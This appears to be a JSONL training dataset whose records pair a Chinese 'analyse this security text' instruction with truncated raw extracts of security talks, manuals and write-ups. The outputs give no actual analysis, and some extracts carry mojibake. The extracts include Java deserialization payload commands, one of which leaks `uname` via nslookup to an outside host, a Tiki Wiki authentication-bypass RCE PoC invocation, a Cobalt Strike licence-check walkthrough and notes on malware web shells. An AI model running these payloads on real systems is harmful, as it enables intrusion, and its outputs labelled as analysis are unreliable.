{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n常規攻擊的 實時檢測 ( WEB APP ) amxku 攜程安全 // sec.ctrip.com # About me - Security Architect at Ctrip - @amxku - sebug.net // sec.ctrip.com OWASP  Top10  Scanner(vul/info)  Spam(info/login/register)  Trojan(gh0st RAT)  On-line/Off-line On-line WEB  APP  LOG Real-time // Analysis // Dashboard 任务I度 applog   Slog userlog logstash ElasticSearch 任务添加 E果展示 任务队列 Elasticsearch client 搜索 逻辑引擎 二次  析 自动化 验证 E果 响应 ESlog 规则平台 事件管理 Log IIS Log Gateway  SPer Hbase Rule IPS dashboard White List IP Nslookup Login log alerting Storm Cluster 搜索引擎检C IPHG库  FE IISFilter 响应 Off-line APT  ? # Trojan - 木馬心跳是與C&C服務器保持連接的主要方式通過對木馬心跳行 為的特徵檢測可以識別一些可疑的木馬通信行為 - 週期性 / 持續性 / 簡潔性 / 特定性 #變異係數Coefficient of Variation - V = ( SD/MN ) % 100 SD標準差 ,MN平均值 3001,2998,9990,2999 3000,3004,2996,3001 2997, 0,2999,3003 3001,2998,2999 3000,3004,2996,3001 2997,2999,3003 MN = SD = CV = Moloch filter Cuckoo Cuckoo  PCDA  Closed Loop THANK YOU @amxku", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Network Services Administration For Version 10.3 or Later 034-2351_Cvr 9/12/03 10:26 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AirPort, AppleScript, AppleShare, AppleTalk, Mac, Mac OS, Macintosh, Power Mac, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. Adobe and PostScript are trademarks of Adobe Systems Incorporated. Java and all Java-based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company, Ltd. 034-2351/9-20-03 LL2351.Book Page 2 Monday, September 8, 2003 2:47 PM 3 1 Contents Preface 5 How to Use This Guide 5 Whats Included in This Guide 5 Using This Guide 6 Setting Up Mac OS X Server for the First Time 6 Getting Help for Everyday Management Tasks 6 Getting Additional Information Chapter 1 7 DHCP Service 7 Before You Set Up DHCP Service 9 Setting Up DHCP Service for the First Time 10 Managing DHCP Service 14 Monitoring DHCP Service 16 Where to Find More Information Chapter 2 17 DNS Service 18 Before You Set Up DNS Service 18 Setting Up DNS Service for the First Time 21 Managing DNS Service 22 Managing Zones 25 Managing Records 28 Monitoring DNS 30 Securing the DNS Server 33 Common Ne", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSECURITY PAPER Preparation Date: 11 Dec 2016 Art of Anti Detection  1 Introduction to AV & Detection Techniques Prepared by: Ege BALCI Penetration Tester ege.balci<at>invictuseurope.com INVICTUS 2 Security TABLE OF CONTENT 1. Abstract:.............................................................................................................................................. 3 2. Introduction........................................................................................................................................3 3. Terminology....................................................................................................................................... 3 4. Common Techniques..................................................................................................................... 4 4.1 Obfuscation............................................................................................................................... 4 4.2 Packers........................................................................................................................................ 4 4.3 Crypters...................................................................................................................................... 5 5. The Problem About Crypters & Packers............................................................................... 5 5.1 PE Injection:............................................................................................................................. 5 6. Perfect Approach..............................................................................................................................6 7. Heuristic Engines.......................................................................................................................... 10 8. Decrypt Shellcode.........................................................................................................................10 9. Dynamic Analysis Detectio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n>>> Picking Bluetooth Low Energy Locks from a Quarter Mile Away Anthony Rose & Ben Ramsey [1/42] >>> whoami [2/42] * Anthony Rose - Researcher, Merculite Security - Lockpicking hobbyist - BS in Electrical Engineering - Prior work: Wireless video traffic analysis - Currently focused on BLE security * Ben Ramsey - Research Director, Merculite Security - Wireless geek - PhD in Computer Science - Recent work: Z-Wave attacks -DerbyCon 2015 -ShmooCon 2016 -PoC||GTFO 12 >>> Overview 1. Goals 2. What is Bluetooth Low Energy? 3. Why Should I Care? 4. Exploits 5. Demo 6. Takeaways & Future Work 7. Questions [3/42] >>> Goals [4/42] * Identify vulnerabilities in BLE smart locks * Release proof of concept exploits * Put pressure on vendors to improve security * Raise consumer awareness >>> What is Bluetooth Low Energy? [5/42] * Designed for apps that dont need to exchange large amounts of data * Minimal power consumption * Operates at 2.4 GHz (same as Bluetooth Classic) * Short range (<100m) >>> What is Bluetooth Low Energy? [6/42] * GATT (Generic Attribute Profile) - Client sends requests to GATT server - Server stores attributes >>> Why Should I Care? [7/42] * Widely used and gaining popularity * Securing homes and valuables * Current BLE \"security\" products: - Deadbolts - Bike locks - Lockers - Gun Cases - Safes - ATMs - Airbnb >>> Who is Using BLE? [8/42] >>> Bluetooth Hacking is Affordable [9/42] * Ubertooth One - $100 * Bluetooth Smart USB dongle - $15 * Raspberry Pi - $40 * High gain directional antenna - $50 >>> Ubertooth One [10/42] * Created by Michael Ossmann * Open source Bluetooth tool * First affordable Bluetooth monitoring and development platform * Promiscuous sniffing * BLE receive only capability (with current firmware) >>> Wardriving [11/42] * Ubertooth + high gain directional antenna * Bluetooth dongle * Easy deployment * Long range (1/4+ mile) * Concealable * Warflying with drones... >>> Wardriving [12/42] >>> Wardriving [12/42] >>> Uncracked Locks [13/42] *", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"SYSTEMD\\-MACHINE\\-ID\\-SETUP\" \"1\" \"\" \"systemd 231\" \"systemd-machine-id-setup\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" systemd-machine-id-setup \\- 初始化 /etc/machine\\-id 文件 .SH \"SYNOPSIS\" .HP \\w'\\fBsystemd\\-machine\\-id\\-setup\\fR\\ 'u \\fBsystemd\\-machine\\-id\\-setup\\fR .SH \"描述\" .PP \\fBsystemd\\-machine\\-id\\-setup\\fR 可被操作系统安装程序用来初始化 /etc/machine\\-id 中的\"machine ID\"值 可以设为一个指定值也可以设为一个随机生成的值详见 \\fBmachine-id\\fR(5) 手册 .PP 如果没有明确使用 \\fB\\-\\-commit\\fR 选项并且 /etc/machine\\-id 不存在或其中的值不合格 那么将初始化一个新的\"machined ID\" 此新\"machine ID\"将依次使用下列方法获得 .sp .RS 4 .ie n \\{\\ \\h'-04' 1.\\h'+01'\\c .\\} .el \\{\\ .sp -1 .IP \" 1.\" 4.2 .\\} 如果已经存在一个有效的 D\\-Bus \"machine ID\" 那么就使用此 D\\-Bus \"machine ID\" 来初始化 /etc/machine\\-id 文件 .RE .sp .RS 4 .ie n \\{\\ \\h'-04' 2.\\h'+01'\\c .\\} .el \\{\\ .sp -1 .IP \" 2.\" 4.2 .\\} 如果运行在已经配置了UUID(通过 \\fB\\-uuid\\fR 选项)的KVM虚拟机中 那么就使用此UUID来初始化 /etc/machine\\-id 文件 KVM虚拟机的创建者 必须确保UUID的唯一性 .RE .sp .RS 4 .ie n \\{\\ \\h'-04' 3.\\h'+01'\\c .\\} .el \\{\\ .sp -1 .IP \" 3.\" 4.2 .\\} 如果运行在已经配置了UUID的Linux容器中 那么就使用此UUID来初始化 /etc/machine\\-id 文件 详见 \\m[blue]\\fBContainer Interface\\fR\\m[]\\&\\s-2\\u[1]\\d\\s+2 文档 .RE .sp .RS 4 .ie n \\{\\ \\h'-04' 4.\\h'+01'\\c .\\} .el \\{\\ .sp -1 .I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Active Directory Administrator Insecurities Sean Metcalf @Pyrotek3 ABOUT  Founder Trimarc (Trimarc.io), a professional services company that helps organizations better secure their Microsoft platform, including the Microsoft Cloud.  Microsoft Certified Master (MCM) Directory Services  Speaker: Black Hat, Blue Hat, BSides, DEF CON, DerbyCon, Shakacon, Sp4rkCon  Security Consultant / Researcher  Active Directory Enthusiast - Own & Operate ADSecurity.org (Microsoft platform security info) AGENDA  Where We Were & Where We Are Now  Blue Sharpens Red  Old-School AD Admin Methods  The New School Methods  Exploiting Administrative Assumptions  The Latest Best Way to Admin AD (& How to Bypass It)  Conclusion Where We Were  In the beginning, there were admins everywhere.  Some environments actually had almost as many Domain Admins as users.  This resulted in a target rich environment with multiple paths to exploit.  Traditional methods of administration are trivial to attack and compromise due to admin credentials being available on the workstation. Where We Are Now  Organizations are slowly & gradually improving defenses.  Limit privileged rights  Reduce admin group membership  Reduce rights down to what's actually required  Limit Admin logon capability & location  Group Policy or user logon controls  This is definitely a step in the right direction, but still does not *solve* the issues with how administration is typically done  Mostly still performed from a regular workstation Blue Sharpens Red (& vice versa)  if you were used to running your standard playbook and never made it past Chapter 1, know that this will change (if it hasn't already).  There will always be weaknesses to exploit, but defenders are getting better. Red needs to adapt.  What do you do when the standard playbook doesnt work? Old-School AD Administration  Logon to workstation as an admin  RunAs on workstation and run standard Microsoft MMC admin tools (\"Active Directory Users & Computers)  RD", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Plague of Lice ## Description > > So the Lord said to Moses, Say to Aaron, Stretch out your rod, and strike the dust of the land, so that it may become lice throughout all the land of Egypt. And they did so. For Aaron stretched out his hand with his rod and struck the dust of the earth, and it became lice on man and beast. All the dust of the land became lice throughout all the land of Egypt (Exodus 8:16-17). > > I hate lice. Every time they come they never leave, and the worst part is that there are SO MANY of them. > > P.S: we are not using ads on our file system A RAR archive was attached. ## Solution After extracting the archive, we find the following directory structure: ```console (user@kali)-[/media/sf_CTFs/basmach/Plague_of_lice/Passover] $ tree -d .  almost here  its here   could be here   or here   try here  maybe here  here  not here  trust me it's here 9 directories ``` Inside the directories there are around 26,000 files: ```console (user@kali)-[/media/sf_CTFs/basmach/Plague_of_lice/Passover] $ find . -type f | wc -l 26052 ``` All the files are text files called `FLAG<n>.txt` where `<n>` is a running number. Let's see a few: ```console (user@kali)-[/media/sf_CTFs/basmach/Plague_of_lice/Passover] $ find . -name \"*.txt\" | head -n 10 | xargs -d '\\n' -i sh -c \"cat '{}'; echo\" BSMCH{posS_onVA} BSMCH{pesS_orVQ} BSMCH{pssS_oyVQ} BSMCH{prsS_ogVJ} BSMCH{pdsS_omVU} BSMCH{posS_owVZ} BSMCH{phsS_ogVT} BSMCH{pnsS_okVB} BSMCH{pssS_otVT} BSMCH{pdsS_opVF} ``` ... All, but one! ```console (user@kali)-[/media/sf_CTFs/basmach/Plague_of_lice/Passover] $ find . -type f | file -f - | grep -v ASCII ./almost here/its here/FLAG53.txt: PNG image data, 406 x 280, 8-bit/color RGBA, non-interlaced ``` Unfortunately that's a red herring too (image just says \"Flag!\"). Let's go back to the description: > P.S: we are not using ads on our file system In the context of file system, \"ads\" can refer to [\"Alternate Data Streams\"](https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(AD", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Java Deserialization ## Detection - `\"AC ED 00 05\"` in Hex * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol. * `00 05`: STREAM_VERSION. The serialization version. - `\"rO0\"` in Base64 - Content-type = \"application/x-java-serialized-object\" - `\"H4sIAAAAAAAAAJ\"` in gzip(base64) ## Tools ### Ysoserial [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ```java java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` **List of payloads included in ysoserial:** ```ps1 Payload Authors Dependencies ------- ------- ------------ AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 Clojure @JackOfMostTrades clojure:1.8.0 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 CommonsCollections1 @frohoff commons-collections:3.1 CommonsCollections2 @frohoff commons-collections4:4.0 CommonsCollections3 @frohoff commons-collections:3.1 CommonsCollections4 @frohoff commons-collections4:4.0 CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 CommonsCollections6 @matthias_kaiser commons-collections:3.1 CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 Groovy1 @frohoff groovy:2.3.9 Hibernate1 @mbechler Hibernate2 @mbechler JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n红蓝攻防构建实战化网络安全防御体系 奇安信安服团队 著 ISBN978-7-111-70640-3 本书由机械工业出版社华章分社授权北京世纪卓越信息技术有限公司 在全球范围内制作与发行 版权所有侵权必究 目录 作者简介 作者名单 前言 第一部分 红蓝对抗基础 第1章 认识红蓝紫 1.1 实战攻防演练 1.1.1 为什么要进行实战攻防演练 1.1.2 实战攻防演练的发展现状 1.2 蓝队 1.2.1 什么是蓝队 1.2.2 蓝队演变趋势 1.3 红队 1.3.1 什么是红队 1.3.2 红队演变趋势 1.4 紫队 1.4.1 什么是紫队 1.4.2 紫队演变趋势 1.5 实战攻防演练中暴露的薄弱环节 1.6 建立实战化的安全体系 第二部分 蓝队视角下的防御体系突破 第2章 蓝队攻击的4个阶段 2.1 准备工作 2.1.1 工具准备 2.1.2 专业技能储备 2.1.3 人才队伍储备 2.2 目标网情搜集 2.2.1 何为网情搜集 2.2.2 网情搜集的主要工作 2.2.3 网情搜集的途径 2.3 外网纵向突破 2.3.1 何为外网纵向突破 2.3.2 外网纵向突破的主要工作 2.3.3 外网纵向突破的途径 2.4 内网横向拓展 2.4.1 何为内网横向拓展 2.4.2 内网横向拓展的主要工作 2.4.3 内网横向拓展的途径 第3章 蓝队常用的攻击手段 3.1 漏洞利用 3.1.1 SQL注入漏洞 3.1.2 跨站漏洞 3.1.3 文件上传或下载漏洞 3.1.4 命令执行漏洞 3.1.5 敏感信息泄露漏洞 3.1.6 授权验证绕过漏洞 3.1.7 权限提升漏洞 3.2 口令爆破 3.2.1 弱口令 3.2.2 口令复用 3.3 钓鱼攻击 3.3.1 外网钓鱼 3.3.2 内网钓鱼 3.3.3 钓鱼应急措施 3.4 供应链攻击 3.4.1 网络或平台提供商 3.4.2 安全服务提供商 3.4.3 产品或应用提供商 3.5 VPN仿冒接入 3.6 隐蔽隧道外连 3.7 社会工程学攻击 3.8 近源攻击 第4章 蓝队攻击的必备能力 4.1 实战化能力与传统能力的区别 4.2 实战化蓝队人才能力图谱 4.2.1 基础能力 4.2.2 进阶能力 4.2.3 高阶能力 第5章 蓝队经典攻击实例 5.1 正面突破跨网段控制工控设备 5.2 浑水摸鱼社工钓鱼突破系统 5.3 偷梁换柱冒充客户突破边界 5.4 声东击西混淆流量躲避侦察 5.5 迂回曲折供应链定点攻击 5.6 李代桃僵旁路攻击搞定目标 5.7 顺手牵羊巧妙种马实施控制 5.8 暗度陈仓迂回渗透取得突破 5.9 短兵相接近源渗透直入内网 第三部分 红队视角下的防御体系构建 第6章 红队防守的实施阶段 6.1 备战阶段兵马未动粮草先行 6.2 临战阶段战前动员鼓舞士气 6.3 实战阶段全面监测及时处置 6.4 总结阶段全面复盘总结经验 第7章 红队常用的防守策略 7.1 信息清理互联网敏感信息 7.2 收缩战线收敛互联网暴露面 7.3 纵深防御立体防渗透 7.4 守护核心找到关键点 7.5 协同作战体系化支撑 7.6 主动防御全方位监控 7.7 应急处突完备的方案 7.8 溯源反制人才是关键 第8章 红队常用的防护手段 8.1 防信息泄露 8.1.1 防文档信息泄露 8.1.2 防代码托管泄露 8.1.3 防历史漏洞泄露 8.1.4 防人员信息泄露 8.1.5 防其他信息泄露 8.2 防钓鱼 8.3 防供应链攻击 8.4 防物理攻击 8.5 防护架构加强 8.5.1 互联网暴露面收敛 8.5.2 网络侧防御 8.5.3 主机侧防御 8.5.4 Web侧防御 8.5.5 App客户端安全 第9章 红队常用的关键安全设备 9.1 边界防御设备 9.1.1 防火墙 9.1.2 入侵防御系统 9.1.3 Web应用防火墙 9.1.4 Web应用安全云防护系统 9.1.5 邮件威胁感知系统 9.2 安全检测设备 9.2.1 互联网资产发现系统 9.2.2 自动化渗透测试系统 9.2.3 开源组件检测系统 9.2.4 运维安全管理与审计系统堡垒机 9.3 流量监测设备 9.3.1 流量威胁感知系统 9.3.2 态势感知与安全运营平台 9.3.3 蜜罐系统 9.4 终端防护设备 9.4.1 终端安全响应系统 9.4.2 服务器安全管理系统 9.4.3 虚拟化安全管理系统 9.4.4 终端安全准入系统 9.4.5 终端安全管理系统 9.5 威胁情报系统 第10章 红队经典防守实例 10.1 严防死守零失陷某金融单位防守实例 10.1.1 领导挂帅高度重视 10.1.2 职责明确全员参战 10.1.3 全面自查管控风险 10.1.4 顽强作战联防联控 10.2 厘清现状保核心某集团公司防守实例 10.2.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAggressor.main 进入相关认证工 作 cs.jar 开始运行 输出相关错误比 如缺少验证正数等 错误 错误 成功启动相关 UI new Authorization() 开始认证 开始认证 退出程序 readFile(\"cobaltstrike.auth\") 将数据代入 _decrypt() 进行 RSA 解密此处使用公钥解 密 将返回的 将返回的 byte[] 步入 步入 AuthCrypto.derypt() 将公钥文件进行解 析并计算 MD5 与指 定值进行对比 load() -> readAll(\"authpub.key\") new AuthCrypto() cipher 生成 生成 pubkey 生成 生成 狗头退出 狗头退出 MD5 对比失败 对比失败 将 cipher 和 pubkey 代入 _decrypt() 经过 DataParser.readInt() 将 byte 的前 4 个字节转 成有符号 Int 返回一个新的数组 根据有符号 Int 值进行对比 判断 .auth 是否符合要求 处理文件头最终返回一个数组 该数组就是解密 .auth 的最终结果 解码返回的 byte[] 数据 对比失败 对比失败 return new byte[0] 判断 validtovalid dataParser.readBytes(16) byte[16] decryptKey 验证未通过 验证未通过 输出相应错误 输出相应错误 注GUI 和 Console 的验证 一致 将该 key 代入 SleeveSecurity.registerKey() 获取一个 byte[32] digest 分解 digest 前16位作为 AES key 后16位作为 Hmac key new SleeveSecurity() mac = Mac.getInstance(\"HmacSHA256\"); 生成了一个 RSA/ECB/PKCS1Padding 的 ciper 当程序调用 SleevedResource.readResource() 时进行下一步的解密 将字符串中的resources/ 替换成 sleeve/ 因此实际上读取的是 sleeve 中的文件 将文件读取返回 byte[] SleeveSecurity.decrypt() 将 byte[] 分成两部分 第一部分是文件主体 第二部分作为对比 flag 代入 Hmac key 将主体部分进行 Hmac 摘 要认证截取前 16位与 第二部分作对比 对文件主体进行 AES 解密返回解密后的 byte[] 对比失败 对比失败 报错 [Sleeve] Bad HMAC on ... 代入 AES key RcoIl 出品", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBluehat Shanghai 2019 | David dwizzzle Weston | Microsoft OS Security Group Manager 不断增强的 Windows 安全性 早上好 上海 PC 上的 Windows 熟悉的桌面体验 庞大的硬件生态 桌面应用兼容性 One Core OS 基础操作系统 应用和设备平台 运行时和框架 Xbox 上的 Windows Windows 10 界面体验 独特的安全模型 共享的游戏体验 IoT 中的 Windows 基础操作系统 应用和设备平台 运行时和框架 还有更多地方 适配不同形态设备 界面体验 支持不同设备场景 Windows 正在不断进化 恶意代码无法在设备 上存留 违反承诺的举措会被 立即发现 所有应用和系统组件 仅具备必须的特权 所有代码执行均可保 证完整性 用户标识无法被攻陷 嗅探或盗窃 随意通过物理方式访 问的攻击者无法修 改设备上的数据或代 码 增强的安全性 Windows 10 S 10 S 统 2 1 强制代码签名 无需密码即可登录 Admin Less用户帐户 4 3 阻止来自互联网的脚本和宏 1 以管理员身份运行 2 执行不带签名的代码 3 使用密码 4 缓解措施并不总能生效 10 S安装数上百万尚未检测到广泛传播的恶意软件 所有代码执行均可保证完整性 代码完整性的改进 CI 策略移除了大部分代理的二进制文件 仅提供带有应用商店签名的应用UWP 或 Centennial 支持危险操作的远程文件扩展已被阻止 远程 Office 宏默认已被阻止 Windows 10 S 所有二进制文件 带有微软签名的 代理的二进制文件 危险的句柄 远程的危险 文件 第一重代码完整性保护 第一重CI 绕过使得远程攻击者能够触发未签名代 码的初始执行 10 S 侧重于防止第一重绕过 第二重绕过使得在执行完初始代码 之后可以进 一步执行更多未签名代码 10 S 为第二重绕过提供了持久的保证 Windows 10 S Network Physical Machine Trigger Handler No Yes 10 S restricts dual use non-PE with cloud service 漏洞利用缓解策略 提高被利用的成 本 控制流完整性 仅限签名代码 只读数据 消除不同类型的漏洞 控制流面临的挑战 危险的调用目 标 不受保护的栈 数据流破坏 1 2 3 ((void(*)(int, int)) funcptr)(0, 1); obj->method1(); void function_A(int, int) { ... } int function_B(int, int) { ... } void function_C(Object*) { ... } void Object::method1() { ... } void Object::method1(int, int) { ... } void Object::method2() { ... } void Object2::method1() { ... } 调用站点 调用目标 CFG Windows 中的第一代 CFI出于兼容性和性能方面的考虑粒度较大 使用导出限制减小特定进程如 Microsoft Edge中合法调用点的数量 改善控制流完整性 隆重介绍XFG 目标通过高效兼容性高的方式提供更细化的 CFI 概念通过类型签名检查保证合法的间接跳转 ((void(*)(int, int)) funcptr)(0, 1); obj->method1(); void function_A(int, int) { ... } int function_B(int, int) { ... } void function_C(Object*) { ... } void Object::method1() { ... } void Object::method1(int, int) { ... } void Object::method2() { ... } void Object2::method1() { ... } 调用站点 调用目标 改善控制流完整性 XFG 的设计基础 为每个获取地址的函数分配一个基于类型签名的标志 对于 C 风格的函数可能为 hash(type(return_value), type(arg1), type(arg2), ...) 对于 C++ 虚拟方法可能为 hash(method_name, type(retval), highest_parent_with_method(type(this), method_name), type(arg1), type(arg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Tiki Wiki CMS Groupware 21.1 Authentication Bypass (CVE-2020-15906) [中文版本(Chinese version)](README.zh-cn.md) Tiki Wiki CMS Groupware or simply Tiki, originally known as TikiWiki, is a free and open source Wiki-based content management system and online office suite written primarily in PHP and distributed under the GNU Lesser General Public License (LGPL) license. There is a new vulnerability in TikiWiki Cms Groupware 16.x - 21.1. It allows remote unauthenticated attackers to bypass the login page which results in a full compromise of Tiki Wiki CMS. An Attacker is able to bruteforce the Admin account until it is locked. After that an empty Password can be used to authenticate as admin to get access. References: - https://info.tiki.org/article473-Security-Releases-of-all-Tiki-versions-since-16-3 - https://github.com/S1lkys/CVE-2020-15906 - http://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html - https://srcincite.io/pocs/cve-2021-26119.py.txt ## Vulnerable environment Execute following commands to start a Tiki Wiki CMS 21.1: ``` docker compose up -d ``` After the server is running, browser the `http://your-ip:8080` to see the welcome page. ## Exploit [POC](https://srcincite.io/pocs/cve-2021-26119.py.txt) comblines two bugs which lead to remote code execution: Bug 1: CVE-2020-15906 - An unauthenticated user can bypass the authentication by bruteforcing the admin account > 50 times and login with a blank password - Works on: <= 21.1 (UY_Scuti) Bug 2: CVE-2021-26119 - An admin user can trigger a serverside template injection and gain remote code execution by escaping the sandbox of the Smarty Template Engine by leveraging the 'template_object' property - Works on: <= 22.2 (Corona_Borealis) and impacts Smarty <= 3.1.38 (latest) ```shell python poc.py your-ip:8080 / id ``` ![](1.png) *WARNING* This exploit will lock out the administrator account.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOutline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Meddle: Framework for piggy-back fuzzing and tool development Geo McDonald glmcdona@gmail.com, unaffiliated presentation August 8, 2014 DEF CON 22 Geo McDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion 1. Background About Me Fuzzing File Format Fuzzing Protocol Fuzzing 2. Meddle Framework Introduction Meddle Target Meddle Process Meddle Controller 3. XRDP Fuzzing XRDP Server 4. DeviceIoControl DeviceIoControl Demo 5. Sandbox Malware Sandbox Demo 6. Conclusion Geo McDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion About Me About Me Vancouver, Canada Game hacking (Ultima Online MMORPG) Reverse-engineering tool development Previously Symantec Currently at Microsoft Personal website http://www.split-code.com/ Geo McDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Fuzzing Types of Fuzzing File Format Fuzzing PDF, Microsoft Word, or TrueType fonts Protocol Fuzzing RDP, VNC, SSL, or Voip Application Fuzzing COM objects, API calls, or inter-process communication Web Application Fuzzing Joomla, WordPress, or any website Geo McDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Fuzzing Fuzzing Tools SPIKE from Immunity [1] Network protocols and web applications Basic Fuzzing Framework (BFF) from CERT [2] File format SAGE from Microsoft [3] Input fuzzing AutoFuzz [4] Network protocols by MITM COMRaider [5] COM interfac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIftach Ian Amit Managing Partner Security Art Down the rabbit Hole Agenda  Background on research  The server  first impressions  Doors, windows, whatever you want to call these  Dances with lawyers  Slip sliding down the hole  Tools  Scripts  Logs, logins, and other soft data  Meanwhile  CERTCC and other gentleman  Closure?  The McColo connection(s)  Final words, predictions Who Am I ? (iamit)  Iftach Ian Amit  In Hebrew it makes more sense  Managing Partner at Security Art  Past:  Director Security Research @ Aladdin  Director Security Research @ Finjan  Various security consulting/integration gigs in the past  R&D  IT  A helping hand when needed (IAF) Background  how do you start anyway?  Uberskillz  And sheer luck  Anyone familiar with triquitips.com?  Come on  its a tips for better programming site  Neither was I.  How about federconsumatori.it (consumer reports for Italy)  A lot of these started looking awfully alike and pointing to the same place First encounters  gwtsdjeni.com  Really meaningful  and somewhat different than the usual Torpig naming convention an extra letter gives it up!  (should be xxxxjeni.com and we got xxxxdjeni.com)  So we take a closer look: you speak english?  en.php Doors, windows, whatever you want to call these  Aha! Sherlock, I think we are on to something  If theres a shell, there are at least 57 of them Dances with lawyers  1st dilemma  have we gotten too far?  We followed an injected script on a legitimate site (i.e.  deobfuscate, view source of result, figure out the server general identity, enumerate).  We ran across a service offered by the server, which was not protected by any means of user/password, nor had it any disclaimers (en.php r57new.php).  2nd dilemma  are we going to go any further?  We can already see (i.e. ls) most of the server  by the means granted to us so far  We are not going to bruteforce ourselves into anything, or guess any credentials? Slip sliding down the hole  Guess what was the decision (thank you l", "category": "text_analysis", "source": "security_papers"}
